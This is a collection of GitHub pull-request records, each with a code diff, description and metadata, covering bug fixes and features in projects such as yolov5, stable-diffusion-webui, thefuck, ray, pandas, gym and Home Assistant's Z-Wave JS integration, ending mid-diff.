|
2020-01-29T19:19:41Z
| 395
|
scrapy/scrapy
| 34,370
|
CIoU protected divides
|
diff --git a/utils/metrics.py b/utils/metrics.py
index e17747b703f..858af23efad 100644
--- a/utils/metrics.py
+++ b/utils/metrics.py
@@ -225,8 +225,8 @@ def bbox_iou(box1, box2, xywh=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-7
else: # x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1.chunk(4, 1)
b2_x1, b2_y1, b2_x2, b2_y2 = box2.chunk(4, 1)
- w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps
- w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps
+ w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1
+ w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1
# Intersection area
inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
@@ -244,7 +244,7 @@ def bbox_iou(box1, box2, xywh=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-7
c2 = cw ** 2 + ch ** 2 + eps # convex diagonal squared
rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 + (b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 # center dist ** 2
if CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
- v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
+ v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / (h2 + eps)) - torch.atan(w1 / (h1 + eps)), 2)
with torch.no_grad():
alpha = v / (v - iou + (1 + eps))
return iou - (rho2 / c2 + v * alpha) # CIoU
|
Protected divides in IOU function to resolve https://github.com/ultralytics/yolov5/issues/8539
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)</sub>
### 🌟 Summary
Optimization of bounding box intersection-over-union calculations in YOLOv5.
### 📊 Key Changes
- 📐 Removed an epsilon (`eps`) addition in the width and height calculations of bounding boxes.
- 🔍 Adjusted the `v` term in the Complete Intersection over Union (CIoU) loss calculation to prevent division by zero during the aspect ratio term computation.
### 🎯 Purpose & Impact
- 🧹 The changes serve to clean up the intersection-over-union (IoU) computation, potentially leading to more accurate bounding box evaluations.
- 👨💻 For users and developers, these tweaks might result in slight performance enhancements during model training and evaluation, and more precise object detection metrics.
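
A self-contained sketch of the eps-protected aspect-ratio term, using the same formula as the diff (the box widths and heights below are made up to show the degenerate case):

```python
# Sketch of the protected aspect-ratio term v from the CIoU formula, matching
# the change in bbox_iou; a zero-height box no longer produces inf/nan.
import math
import torch

eps = 1e-7
w1, h1 = torch.tensor([2.0]), torch.tensor([0.0])   # degenerate box: h1 == 0
w2, h2 = torch.tensor([1.0]), torch.tensor([1.0])

v = (4 / math.pi ** 2) * torch.pow(
    torch.atan(w2 / (h2 + eps)) - torch.atan(w1 / (h1 + eps)), 2
)
assert torch.isfinite(v).all()
```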
|
https://api.github.com/repos/ultralytics/yolov5/pulls/8546
|
2022-07-11T13:24:33Z
|
2022-07-11T14:07:12Z
|
2022-07-11T14:07:12Z
|
2024-01-19T08:42:13Z
| 620
|
ultralytics/yolov5
| 25,647
|
Add support for SD 2.1 Turbo
|
diff --git a/modules/sd_hijack.py b/modules/sd_hijack.py
index 0157e19f003..3d340fc9b21 100644
--- a/modules/sd_hijack.py
+++ b/modules/sd_hijack.py
@@ -38,9 +38,6 @@
optimizers = []
current_optimizer: sd_hijack_optimizations.SdOptimization = None
-ldm_original_forward = patches.patch(__file__, ldm.modules.diffusionmodules.openaimodel.UNetModel, "forward", sd_unet.UNetModel_forward)
-sgm_original_forward = patches.patch(__file__, sgm.modules.diffusionmodules.openaimodel.UNetModel, "forward", sd_unet.UNetModel_forward)
-
def list_optimizers():
new_optimizers = script_callbacks.list_optimizers_callback()
@@ -258,6 +255,9 @@ def flatten(el):
import modules.models.diffusion.ddpm_edit
+ ldm_original_forward = patches.patch(__file__, ldm.modules.diffusionmodules.openaimodel.UNetModel, "forward", sd_unet.UNetModel_forward)
+ sgm_original_forward = patches.patch(__file__, sgm.modules.diffusionmodules.openaimodel.UNetModel, "forward", sd_unet.UNetModel_forward)
+
if isinstance(m, ldm.models.diffusion.ddpm.LatentDiffusion):
sd_unet.original_forward = ldm_original_forward
elif isinstance(m, modules.models.diffusion.ddpm_edit.LatentDiffusion):
@@ -303,6 +303,9 @@ def undo_hijack(self, m):
self.layers = None
self.clip = None
+ patches.undo(__file__, ldm.modules.diffusionmodules.openaimodel.UNetModel, "forward")
+ patches.undo(__file__, sgm.modules.diffusionmodules.openaimodel.UNetModel, "forward")
+
sd_unet.original_forward = None
diff --git a/modules/sd_models.py b/modules/sd_models.py
index 841402e8629..9355f1e16b7 100644
--- a/modules/sd_models.py
+++ b/modules/sd_models.py
@@ -230,15 +230,19 @@ def select_checkpoint():
return checkpoint_info
-checkpoint_dict_replacements = {
+checkpoint_dict_replacements_sd1 = {
'cond_stage_model.transformer.embeddings.': 'cond_stage_model.transformer.text_model.embeddings.',
'cond_stage_model.transformer.encoder.': 'cond_stage_model.transformer.text_model.encoder.',
'cond_stage_model.transformer.final_layer_norm.': 'cond_stage_model.transformer.text_model.final_layer_norm.',
}
+checkpoint_dict_replacements_sd2_turbo = { # Converts SD 2.1 Turbo from SGM to LDM format.
+ 'conditioner.embedders.0.': 'cond_stage_model.',
+}
+
-def transform_checkpoint_dict_key(k):
- for text, replacement in checkpoint_dict_replacements.items():
+def transform_checkpoint_dict_key(k, replacements):
+ for text, replacement in replacements.items():
if k.startswith(text):
k = replacement + k[len(text):]
@@ -249,9 +253,14 @@ def get_state_dict_from_checkpoint(pl_sd):
pl_sd = pl_sd.pop("state_dict", pl_sd)
pl_sd.pop("state_dict", None)
+ is_sd2_turbo = 'conditioner.embedders.0.model.ln_final.weight' in pl_sd and pl_sd['conditioner.embedders.0.model.ln_final.weight'].size()[0] == 1024
+
sd = {}
for k, v in pl_sd.items():
- new_key = transform_checkpoint_dict_key(k)
+ if is_sd2_turbo:
+ new_key = transform_checkpoint_dict_key(k, checkpoint_dict_replacements_sd2_turbo)
+ else:
+ new_key = transform_checkpoint_dict_key(k, checkpoint_dict_replacements_sd1)
if new_key is not None:
sd[new_key] = v
|
## Description
This adds support for the newly released [Stable Diffusion 2.1 Turbo](https://huggingface.co/stabilityai/sd-turbo/blob/main/sd_turbo.safetensors) model, which is more lightweight than sdxl-turbo.
Until now, all SD1 and SD2 models have been released in the [LDM format](https://github.com/Stability-AI/stablediffusion), and all SDXL models have been released in [SGM format](https://github.com/Stability-AI/generative-models/tree/main/sgm). Because of that, there is a strong assumption all over the webui codebase that SGM format implies SDXL.
However, the SD 2.1 Turbo checkpoint was released in SGM format, breaking that assumption. Rather than rewrite the whole codebase to account for this possibility (possibly breaking extensions), I opted to simply convert the checkpoint from SGM to LDM on load, which is as simple as renaming the dict keys from `conditioner.embedders.0.model.*` to `cond_stage_model.model.*`. By doing this, all features and extensions that were working with SD2 immediately work with SD2 Turbo as well.
This PR also fixes an existing issue where undo_hijack was only partially undoing the hijack, causing loading of SD2 models to fail (because is_using_v_parameterization_for_sd2 was not able to run).
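
A standalone sketch of that key renaming (the real mapping lives in `checkpoint_dict_replacements_sd2_turbo` in the diff):

```python
# Sketch of the SGM -> LDM key conversion: any state-dict key under
# `conditioner.embedders.0.` is re-rooted under `cond_stage_model.`.
replacements = {"conditioner.embedders.0.": "cond_stage_model."}

def rename_key(key: str) -> str:
    for prefix, replacement in replacements.items():
        if key.startswith(prefix):
            return replacement + key[len(prefix):]
    return key

assert rename_key("conditioner.embedders.0.model.ln_final.weight") == \
    "cond_stage_model.model.ln_final.weight"
```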
## Screenshots/videos:

## Checklist:
- [X] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [X] I have performed a self-review of my own code
- [X] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [X] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
|
https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/14170
|
2023-12-02T04:29:49Z
|
2023-12-02T06:30:07Z
|
2023-12-02T06:30:07Z
|
2024-01-07T02:23:45Z
| 871
|
AUTOMATIC1111/stable-diffusion-webui
| 39,894
|
Adding rule for forgotten '-r' when grepping folders
|
diff --git a/tests/rules/test_grep_recursive.py b/tests/rules/test_grep_recursive.py
new file mode 100644
index 000000000..0e3dae1d5
--- /dev/null
+++ b/tests/rules/test_grep_recursive.py
@@ -0,0 +1,12 @@
+from thefuck.rules.grep_recursive import match, get_new_command
+from tests.utils import Command
+
+
+def test_match():
+ assert match(Command('grep blah .', stderr='grep: .: Is a directory'), None)
+ assert not match(Command(), None)
+
+
+def test_get_new_command():
+ assert get_new_command(
+ Command('grep blah .'), None) == 'grep -r blah .'
diff --git a/thefuck/rules/grep_recursive.py b/thefuck/rules/grep_recursive.py
new file mode 100644
index 000000000..ed0b6fdb6
--- /dev/null
+++ b/thefuck/rules/grep_recursive.py
@@ -0,0 +1,7 @@
+def match(command, settings):
+ return (command.script.startswith('grep')
+ and 'is a directory' in command.stderr.lower())
+
+
+def get_new_command(command, settings):
+ return 'grep -r {}'.format(command.script[5:])
|
I guess it's straightforward to understand what it does :)
```
igor:~$ grep "is a directory" .
grep: .: Is a directory
igor:~$ fuck
grep -r "is a directory" .
dev/thefuck/tests/rules/test_rm_dir.py:7: Command('rm foo', stderr='rm: foo: is a directory'),
dev/thefuck/thefuck/rules/grep_recursive.py:3: and 'is a directory' in command.stderr.lower())
dev/thefuck/thefuck/rules/rm_dir.py:8: and 'is a directory' in command.stderr.lower())
```
|
https://api.github.com/repos/nvbn/thefuck/pulls/199
|
2015-05-15T22:28:51Z
|
2015-05-16T09:51:07Z
|
2015-05-16T09:51:07Z
|
2015-05-16T14:19:11Z
| 282
|
nvbn/thefuck
| 30,578
|
fix typo
|
diff --git a/fastchat/train/train_lora.py b/fastchat/train/train_lora.py
index 24c8b8978b..b2fa0a844c 100644
--- a/fastchat/train/train_lora.py
+++ b/fastchat/train/train_lora.py
@@ -41,7 +41,7 @@
@dataclass
class TrainingArguments(transformers.TrainingArguments):
- cache_dir: Optional[str] = field(default=None)
+ cache_dir: typing.Optional[str] = field(default=None)
optim: str = field(default="adamw_torch")
model_max_length: int = field(
default=512,
|
https://api.github.com/repos/lm-sys/FastChat/pulls/2031
|
2023-07-20T11:11:05Z
|
2023-07-20T17:02:36Z
|
2023-07-20T17:02:36Z
|
2023-07-20T17:02:36Z
| 140
|
lm-sys/FastChat
| 41,569
|
|
[workflow] Fix workflow recovery issue due to a bug of dynamic output
|
diff --git a/python/ray/workflow/tests/test_basic_workflows.py b/python/ray/workflow/tests/test_basic_workflows.py
index f5dc73f160e64..971c6f5724677 100644
--- a/python/ray/workflow/tests/test_basic_workflows.py
+++ b/python/ray/workflow/tests/test_basic_workflows.py
@@ -282,6 +282,29 @@ def f1(n):
assert isinstance(err, ValueError)
+def test_dynamic_output(workflow_start_regular_shared):
+ @workflow.step
+ def exponential_fail(k, n):
+ if n > 0:
+ if n < 3:
+ raise Exception("Failed intentionally")
+ return exponential_fail.options(name=f"step_{n}").step(
+ k * 2, n - 1)
+ return k
+
+ # When workflow fails, the dynamic output should points to the
+ # latest successful step.
+ try:
+ exponential_fail.options(name="step_0").step(
+ 3, 10).run(workflow_id="dynamic_output")
+ except Exception:
+ pass
+ from ray.workflow.workflow_storage import get_workflow_storage
+ wf_storage = get_workflow_storage(workflow_id="dynamic_output")
+ result = wf_storage.inspect_step("step_0")
+ assert result.output_step_id == "step_3"
+
+
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
diff --git a/python/ray/workflow/workflow_storage.py b/python/ray/workflow/workflow_storage.py
index b0df708e08cd1..b6a67292dee02 100644
--- a/python/ray/workflow/workflow_storage.py
+++ b/python/ray/workflow/workflow_storage.py
@@ -134,6 +134,7 @@ def save_step_output(self, step_id: StepID, ret: Union[Workflow, Any], *,
outer_most_step_id: See WorkflowStepContext.
"""
tasks = []
+ dynamic_output_id = None
if isinstance(ret, Workflow):
# This workflow step returns a nested workflow.
assert step_id != ret.step_id
@@ -154,9 +155,6 @@ def save_step_output(self, step_id: StepID, ret: Union[Workflow, Any], *,
# tasks.append(self._put(self._key_step_output(step_id), ret))
dynamic_output_id = step_id
# TODO (yic): Delete exception file
- tasks.append(
- self._update_dynamic_output(outer_most_step_id,
- dynamic_output_id))
else:
assert ret is None
promise = serialization.dump_to_storage(
@@ -166,8 +164,17 @@ def save_step_output(self, step_id: StepID, ret: Union[Workflow, Any], *,
# tasks.append(
# self._put(self._key_step_exception(step_id), exception))
+ # Finish checkpointing.
asyncio_run(asyncio.gather(*tasks))
+ # NOTE: if we update the dynamic output before
+ # finishing checkpointing, then during recovery, the dynamic could
+ # would point to a checkpoint that does not exist.
+ if dynamic_output_id is not None:
+ asyncio_run(
+ self._update_dynamic_output(outer_most_step_id,
+ dynamic_output_id))
+
def load_step_func_body(self, step_id: StepID) -> Callable:
"""Load the function body of the workflow step.
|
## Why are these changes needed?
The workflow fails to recover to the latest checkpoint due to a bug in the dynamic output kept in storage. For example,
step A returns step B, and step B returns step C. When step C fails, the workflow recovers from step A instead of step B. This is not a bug in the recovery algorithm but a bug in the dynamic output: the latest dynamic output of the workflow does not get
updated, so it points to the checkpoint of step A instead of step B.
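
A tiny sketch of the ordering fix (names are illustrative, not the real `workflow_storage` API): finish writing the checkpoint first, and only then advance the dynamic-output pointer to it.

```python
# Illustrative ordering only, not the real workflow_storage API: the dynamic
# output pointer must be advanced only after the checkpoint it points to has
# been fully written, otherwise recovery can follow a pointer to nothing.
checkpoints = {}       # step_id -> serialized output
dynamic_output = {}    # outer step id -> id of its latest checkpointed step

def save_step_output(outer_step, step_id, payload):
    checkpoints[step_id] = payload          # 1) finish checkpointing
    dynamic_output[outer_step] = step_id    # 2) then update the pointer

save_step_output("step_0", "step_3", "latest successful result")
assert dynamic_output["step_0"] == "step_3"
assert dynamic_output["step_0"] in checkpoints   # pointer never dangles
```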
## Related issue number
## Checks
- [ ] I've run `scripts/format.sh` to lint the changes in this PR.
- [ ] I've included any doc changes needed for https://docs.ray.io/en/master/.
- [ ] I've made sure the tests are passing. Note that there might be a few flaky tests, see the recent failures at https://flakey-tests.ray.io/
- Testing Strategy
- [ ] Unit tests
- [ ] Release tests
- [ ] This PR is not tested :(
|
https://api.github.com/repos/ray-project/ray/pulls/21571
|
2022-01-13T07:22:00Z
|
2022-01-24T23:34:58Z
|
2022-01-24T23:34:58Z
|
2022-01-24T23:35:00Z
| 765
|
ray-project/ray
| 18,946
|
Fix: Allow `model_name` for `OpenAIEmbedding`
|
diff --git a/llama_index/embeddings/openai.py b/llama_index/embeddings/openai.py
index ac5e8d933d275..500fada6d08f7 100644
--- a/llama_index/embeddings/openai.py
+++ b/llama_index/embeddings/openai.py
@@ -282,6 +282,7 @@ def __init__(
if "model_name" in kwargs:
model_name = kwargs.pop("model_name")
+ self._query_engine = self._text_engine = model_name
else:
model_name = model
|
# Description
`OpenAILike` allows us to use non-OpenAI models with an OpenAI-like API, e.g., by calling:
```
llm = OpenAILike(
model="my-model",
)
```
There's no equivalent class for `OpenAIEmbedding`, but we could use `OpenAIEmbedding` and pass a different `model_name`, e.g.:
```
embed_model = OpenAIEmbedding(
model_name="paraphrase-multilingual-mpnet-base-v2"
)
```
There's already some code for passing `model_name`, which currently doesn't work - this PR fixes this.
## Type of Change
- Bug fix (non-breaking change which fixes an issue)
# How Has This Been Tested?
- I stared at the code and made sure it makes sense
|
https://api.github.com/repos/run-llama/llama_index/pulls/9925
|
2024-01-09T06:50:50Z
|
2024-01-09T18:22:03Z
|
2024-01-09T18:22:03Z
|
2024-01-09T18:22:05Z
| 129
|
run-llama/llama_index
| 6,403
|
Clean up continuous mountain car environment
|
diff --git a/gym/envs/classic_control/continuous_mountain_car.py b/gym/envs/classic_control/continuous_mountain_car.py
index 8f34b268840..5ffc97685c1 100644
--- a/gym/envs/classic_control/continuous_mountain_car.py
+++ b/gym/envs/classic_control/continuous_mountain_car.py
@@ -22,13 +22,14 @@
from gym import spaces
from gym.utils import seeding
+
class Continuous_MountainCarEnv(gym.Env):
metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second': 30
}
- def __init__(self, goal_velocity = 0):
+ def __init__(self, goal_velocity=0):
self.min_action = -1.0
self.max_action = 1.0
self.min_position = -1.2
@@ -38,15 +39,26 @@ def __init__(self, goal_velocity = 0):
self.goal_velocity = goal_velocity
self.power = 0.0015
- self.low_state = np.array([self.min_position, -self.max_speed], dtype=np.float32)
- self.high_state = np.array([self.max_position, self.max_speed], dtype=np.float32)
+ self.low_state = np.array(
+ [self.min_position, -self.max_speed], dtype=np.float32
+ )
+ self.high_state = np.array(
+ [self.max_position, self.max_speed], dtype=np.float32
+ )
self.viewer = None
- self.action_space = spaces.Box(low=self.min_action, high=self.max_action,
- shape=(1,), dtype=np.float32)
- self.observation_space = spaces.Box(low=self.low_state, high=self.high_state,
- dtype=np.float32)
+ self.action_space = spaces.Box(
+ low=self.min_action,
+ high=self.max_action,
+ shape=(1,),
+ dtype=np.float32
+ )
+ self.observation_space = spaces.Box(
+ low=self.low_state,
+ high=self.high_state,
+ dtype=np.float32
+ )
self.seed()
self.reset()
@@ -61,20 +73,23 @@ def step(self, action):
velocity = self.state[1]
force = min(max(action[0], -1.0), 1.0)
- velocity += force*self.power -0.0025 * math.cos(3*position)
+ velocity += force * self.power - 0.0025 * math.cos(3 * position)
if (velocity > self.max_speed): velocity = self.max_speed
if (velocity < -self.max_speed): velocity = -self.max_speed
position += velocity
if (position > self.max_position): position = self.max_position
if (position < self.min_position): position = self.min_position
- if (position==self.min_position and velocity<0): velocity = 0
+ if (position == self.min_position and velocity < 0): velocity = 0
- done = bool(position >= self.goal_position and velocity >= self.goal_velocity)
+ # Convert a possible numpy bool to a Python bool.
+ done = bool(
+ position >= self.goal_position and velocity >= self.goal_velocity
+ )
reward = 0
if done:
reward = 100.0
- reward-= math.pow(action[0],2)*0.1
+ reward -= math.pow(action[0], 2) * 0.1
self.state = np.array([position, velocity])
return self.state, reward, done, {}
@@ -92,9 +107,8 @@ def render(self, mode='human'):
world_width = self.max_position - self.min_position
scale = screen_width/world_width
- carwidth=40
- carheight=20
-
+ carwidth = 40
+ carheight = 20
if self.viewer is None:
from gym.envs.classic_control import rendering
@@ -109,19 +123,23 @@ def render(self, mode='human'):
clearance = 10
- l,r,t,b = -carwidth/2, carwidth/2, carheight, 0
- car = rendering.FilledPolygon([(l,b), (l,t), (r,t), (r,b)])
+ l, r, t, b = -carwidth / 2, carwidth / 2, carheight, 0
+ car = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])
car.add_attr(rendering.Transform(translation=(0, clearance)))
self.cartrans = rendering.Transform()
car.add_attr(self.cartrans)
self.viewer.add_geom(car)
- frontwheel = rendering.make_circle(carheight/2.5)
+ frontwheel = rendering.make_circle(carheight / 2.5)
frontwheel.set_color(.5, .5, .5)
- frontwheel.add_attr(rendering.Transform(translation=(carwidth/4,clearance)))
+ frontwheel.add_attr(
+ rendering.Transform(translation=(carwidth / 4, clearance))
+ )
frontwheel.add_attr(self.cartrans)
self.viewer.add_geom(frontwheel)
- backwheel = rendering.make_circle(carheight/2.5)
- backwheel.add_attr(rendering.Transform(translation=(-carwidth/4,clearance)))
+ backwheel = rendering.make_circle(carheight / 2.5)
+ backwheel.add_attr(
+ rendering.Transform(translation=(-carwidth / 4, clearance))
+ )
backwheel.add_attr(self.cartrans)
backwheel.set_color(.5, .5, .5)
self.viewer.add_geom(backwheel)
@@ -130,15 +148,19 @@ def render(self, mode='human'):
flagy2 = flagy1 + 50
flagpole = rendering.Line((flagx, flagy1), (flagx, flagy2))
self.viewer.add_geom(flagpole)
- flag = rendering.FilledPolygon([(flagx, flagy2), (flagx, flagy2-10), (flagx+25, flagy2-5)])
- flag.set_color(.8,.8,0)
+ flag = rendering.FilledPolygon(
+ [(flagx, flagy2), (flagx, flagy2 - 10), (flagx + 25, flagy2 - 5)]
+ )
+ flag.set_color(.8, .8, 0)
self.viewer.add_geom(flag)
pos = self.state[0]
- self.cartrans.set_translation((pos-self.min_position)*scale, self._height(pos)*scale)
+ self.cartrans.set_translation(
+ (pos-self.min_position) * scale, self._height(pos) * scale
+ )
self.cartrans.set_rotation(math.cos(3 * pos))
- return self.viewer.render(return_rgb_array = mode=='rgb_array')
+ return self.viewer.render(return_rgb_array=mode == 'rgb_array')
def close(self):
if self.viewer:
|
Improve readability and mostly adhere to PEP 8.
I left the one-line ifs (lines 77-81) as they are.
|
https://api.github.com/repos/openai/gym/pulls/1867
|
2020-04-07T09:22:36Z
|
2020-04-10T22:25:02Z
|
2020-04-10T22:25:02Z
|
2020-04-10T22:25:02Z
| 1,573
|
openai/gym
| 5,783
|
BUG: read_csv with specified kwargs
|
diff --git a/doc/source/whatsnew/v0.23.2.txt b/doc/source/whatsnew/v0.23.2.txt
index 67c7ce150132a..0f2c9c4756987 100644
--- a/doc/source/whatsnew/v0.23.2.txt
+++ b/doc/source/whatsnew/v0.23.2.txt
@@ -64,6 +64,7 @@ Bug Fixes
**I/O**
+- Bug in :func:`read_csv` that caused it to incorrectly raise an error when ``nrows=0``, ``low_memory=True``, and ``index_col`` was not ``None`` (:issue:`21141`)
-
-
diff --git a/pandas/io/parsers.py b/pandas/io/parsers.py
index 2c8f98732c92f..65df2bffb4abf 100755
--- a/pandas/io/parsers.py
+++ b/pandas/io/parsers.py
@@ -3209,12 +3209,22 @@ def _get_empty_meta(columns, index_col, index_names, dtype=None):
col = columns[k] if is_integer(k) else k
dtype[col] = v
- if index_col is None or index_col is False:
+ # Even though we have no data, the "index" of the empty DataFrame
+ # could for example still be an empty MultiIndex. Thus, we need to
+ # check whether we have any index columns specified, via either:
+ #
+ # 1) index_col (column indices)
+ # 2) index_names (column names)
+ #
+ # Both must be non-null to ensure a successful construction. Otherwise,
+ # we have to create a generic emtpy Index.
+ if (index_col is None or index_col is False) or index_names is None:
index = Index([])
else:
data = [Series([], dtype=dtype[name]) for name in index_names]
index = _ensure_index_from_sequences(data, names=index_names)
index_col.sort()
+
for i, n in enumerate(index_col):
columns.pop(n - i)
diff --git a/pandas/tests/io/parser/common.py b/pandas/tests/io/parser/common.py
index 2b7ff1f5a9879..b39122e5e7906 100644
--- a/pandas/tests/io/parser/common.py
+++ b/pandas/tests/io/parser/common.py
@@ -238,6 +238,21 @@ def test_csv_mixed_type(self):
out = self.read_csv(StringIO(data))
tm.assert_frame_equal(out, expected)
+ def test_read_csv_low_memory_no_rows_with_index(self):
+ if self.engine == "c" and not self.low_memory:
+ pytest.skip("This is a low-memory specific test")
+
+ # see gh-21141
+ data = """A,B,C
+1,1,1,2
+2,2,3,4
+3,3,4,5
+"""
+ out = self.read_csv(StringIO(data), low_memory=True,
+ index_col=0, nrows=0)
+ expected = DataFrame(columns=["A", "B", "C"])
+ tm.assert_frame_equal(out, expected)
+
def test_read_csv_dataframe(self):
df = self.read_csv(self.csv1, index_col=0, parse_dates=True)
df2 = self.read_table(self.csv1, sep=',', index_col=0,
|
- [+] closes #21141
- [+] tests added / passed
- [+] passes `git diff upstream/master -u -- "*.py" | flake8 --diff`
- [ ] whatsnew entry
Solves issue #21141.
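
A minimal reproducer for the fixed case, mirroring the regression test added in the diff (per that test, the expected result is an empty frame with columns A, B, C):

```python
# Mirrors the regression test added in the diff: with the C parser in
# low-memory mode, nrows=0 plus index_col used to raise instead of
# returning an empty frame.
from io import StringIO
import pandas as pd

data = "A,B,C\n1,1,1,2\n2,2,3,4\n3,3,4,5\n"
out = pd.read_csv(StringIO(data), low_memory=True, index_col=0, nrows=0)
print(out)  # empty DataFrame with columns A, B, C
```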
|
https://api.github.com/repos/pandas-dev/pandas/pulls/21176
|
2018-05-22T20:36:04Z
|
2018-06-19T11:26:49Z
|
2018-06-19T11:26:49Z
|
2018-06-29T14:58:23Z
| 763
|
pandas-dev/pandas
| 45,223
|
Don't remove zwave_js devices automatically
|
diff --git a/homeassistant/components/zwave_js/__init__.py b/homeassistant/components/zwave_js/__init__.py
index ccadc452bc70d5..1321ef36f8506c 100644
--- a/homeassistant/components/zwave_js/__init__.py
+++ b/homeassistant/components/zwave_js/__init__.py
@@ -282,7 +282,8 @@ async def handle_logging_changed(_: Event | None = None) -> None:
for node in controller.nodes.values()
]
- # Devices that are in the device registry that are not known by the controller can be removed
+ # Devices that are in the device registry that are not known by the controller
+ # can be removed
for device in stored_devices:
if device not in known_devices:
self.dev_reg.async_remove_device(device.id)
@@ -509,25 +510,46 @@ def register_node_in_dev_reg(self, node: ZwaveNode) -> dr.DeviceEntry:
driver = self.driver_events.driver
device_id = get_device_id(driver, node)
device_id_ext = get_device_id_ext(driver, node)
- device = self.dev_reg.async_get_device(identifiers={device_id})
+ node_id_device = self.dev_reg.async_get_device(identifiers={device_id})
via_device_id = None
controller = driver.controller
# Get the controller node device ID if this node is not the controller
if controller.own_node and controller.own_node != node:
via_device_id = get_device_id(driver, controller.own_node)
- # Replace the device if it can be determined that this node is not the
- # same product as it was previously.
- if (
- device_id_ext
- and device
- and len(device.identifiers) == 2
- and device_id_ext not in device.identifiers
- ):
- self.remove_device(device)
- device = None
-
if device_id_ext:
+ # If there is a device with this node ID but with a different hardware
+ # signature, remove the node ID based identifier from it. The hardware
+ # signature can be different for one of two reasons: 1) in the ideal
+ # scenario, the node was replaced with a different node that's a different
+ # device entirely, or 2) the device erroneously advertised the wrong
+ # hardware identifiers (this is known to happen due to poor RF conditions).
+ # While we would like to remove the old device automatically for case 1, we
+ # have no way to distinguish between these reasons so we leave it up to the
+ # user to remove the old device manually.
+ if (
+ node_id_device
+ and len(node_id_device.identifiers) == 2
+ and device_id_ext not in node_id_device.identifiers
+ ):
+ new_identifiers = node_id_device.identifiers.copy()
+ new_identifiers.remove(device_id)
+ self.dev_reg.async_update_device(
+ node_id_device.id, new_identifiers=new_identifiers
+ )
+ # If there is an orphaned device that already exists with this hardware
+ # based identifier, add the node ID based identifier to the orphaned
+ # device.
+ if (
+ hardware_device := self.dev_reg.async_get_device(
+ identifiers={device_id_ext}
+ )
+ ) and len(hardware_device.identifiers) == 1:
+ new_identifiers = hardware_device.identifiers.copy()
+ new_identifiers.add(device_id)
+ self.dev_reg.async_update_device(
+ hardware_device.id, new_identifiers=new_identifiers
+ )
ids = {device_id, device_id_ext}
else:
ids = {device_id}
@@ -769,9 +791,12 @@ def async_on_notification(self, event: dict[str, Any]) -> None:
return
driver = self.controller_events.driver_events.driver
- notification: EntryControlNotification | NotificationNotification | PowerLevelNotification | MultilevelSwitchNotification = event[
- "notification"
- ]
+ notification: (
+ EntryControlNotification
+ | NotificationNotification
+ | PowerLevelNotification
+ | MultilevelSwitchNotification
+ ) = event["notification"]
device = self.dev_reg.async_get_device(
identifiers={get_device_id(driver, notification.node)}
)
@@ -984,6 +1009,39 @@ async def async_remove_entry(hass: HomeAssistant, entry: ConfigEntry) -> None:
LOGGER.error(err)
+async def async_remove_config_entry_device(
+ hass: HomeAssistant, config_entry: ConfigEntry, device_entry: dr.DeviceEntry
+) -> bool:
+ """Remove a config entry from a device."""
+ entry_hass_data = hass.data[DOMAIN][config_entry.entry_id]
+ client: ZwaveClient = entry_hass_data[DATA_CLIENT]
+
+ # Driver may not be ready yet so we can't allow users to remove a device since
+ # we need to check if the device is still known to the controller
+ if (driver := client.driver) is None:
+ LOGGER.error("Driver for %s is not ready", config_entry.title)
+ return False
+
+ # If a node is found on the controller that matches the hardware based identifier
+ # on the device, prevent the device from being removed.
+ if next(
+ (
+ node
+ for node in driver.controller.nodes.values()
+ if get_device_id_ext(driver, node) in device_entry.identifiers
+ ),
+ None,
+ ):
+ return False
+
+ controller_events: ControllerEvents = entry_hass_data[
+ DATA_DRIVER_EVENTS
+ ].controller_events
+ controller_events.registered_unique_ids.pop(device_entry.id, None)
+ controller_events.discovered_value_ids.pop(device_entry.id, None)
+ return True
+
+
async def async_ensure_addon_running(hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Ensure that Z-Wave JS add-on is installed and running."""
addon_manager = _get_addon_manager(hass)
diff --git a/tests/components/zwave_js/test_init.py b/tests/components/zwave_js/test_init.py
index 75a7397cc4ed72..38de9f6dd17c9d 100644
--- a/tests/components/zwave_js/test_init.py
+++ b/tests/components/zwave_js/test_init.py
@@ -30,6 +30,7 @@
from .common import AIR_TEMPERATURE_SENSOR, EATON_RF9640_ENTITY
from tests.common import MockConfigEntry, async_get_persistent_notifications
+from tests.typing import WebSocketGenerator
@pytest.fixture(name="connect_timeout")
@@ -1016,6 +1017,7 @@ async def test_node_removed(
client.driver.controller.receive_event(Event("node added", event))
await hass.async_block_till_done()
old_device = dev_reg.async_get_device(identifiers={(DOMAIN, device_id)})
+ assert old_device
assert old_device.id
event = {"node": node, "reason": 0}
@@ -1139,6 +1141,7 @@ async def test_replace_different_node(
hank_binary_switch_state,
client,
integration,
+ hass_ws_client: WebSocketGenerator,
) -> None:
"""Test when a node is replaced with a different node."""
dev_reg = dr.async_get(hass)
@@ -1147,11 +1150,11 @@ async def test_replace_different_node(
state["nodeId"] = node_id
device_id = f"{client.driver.controller.home_id}-{node_id}"
- multisensor_6_device_id = (
+ multisensor_6_device_id_ext = (
f"{device_id}-{multisensor_6.manufacturer_id}:"
f"{multisensor_6.product_type}:{multisensor_6.product_id}"
)
- hank_device_id = (
+ hank_device_id_ext = (
